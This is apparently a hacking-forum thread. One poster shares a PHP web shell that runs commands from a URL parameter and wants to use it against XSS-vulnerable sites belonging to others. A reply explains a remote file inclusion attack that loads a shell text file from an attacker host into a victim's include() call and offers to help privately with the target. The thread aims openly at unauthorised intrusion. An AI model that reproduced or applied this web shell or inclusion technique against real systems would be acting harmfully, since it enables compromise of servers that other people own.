another bloody scripting problem!!

this time I have made the following page:

<?php
$cmd=stripslashes($_GET["cmd"]);
system($cmd);
?>

to get the contents of the directory it is in I would put http://www.mysite.com/page.php?cmd=ls this would work fine as expected… (to go to the root directory I would type:http://www.mysite.com/page.php?cmd=ls+../../../) also as expected.
this works fine to navigate my server, the problem comes when using it in conjunction with XSS, it should load the code on the target vulnreble page!, however everytime I have tryed it I only get the contents of My server…

I have tryed using iframes, img src=, embed etc. yet no luck

Any help would be great

boost, cos this is bloody annoying me. google knows nothing!

Sounds like no one knows what your talking about or doesnt know how its done.

basicly I have found xss voulnerable pages and when I try to enter:

<iframe src= "http://www.mysite.org/cmd.php?cmd=ls+"></iframe>

in target site I should get the contents of their directory, but insted I get the conte4nts of MY directory?!?

I have also tryed other ways with little success

it is strip_slashes() NOT stripslashes()

oh yeah…dugh…lol

n e way it works with stripslashes instead of strip_slashes… but not remotly, if that makes any sence!

Because an IFRAME is just like opening another browser window. The website your on doesnt parse the information on the page it just directs you to it. If, on the other hand, the page is like this: <? include($_GET['page']); ?> Then simply upload your php code into a text file and include it like:

http://www.victim.com/?page=http://www.evil.com/shell.txt

Hope this helps. Maybe you can pm me with the site and ill take a look for you.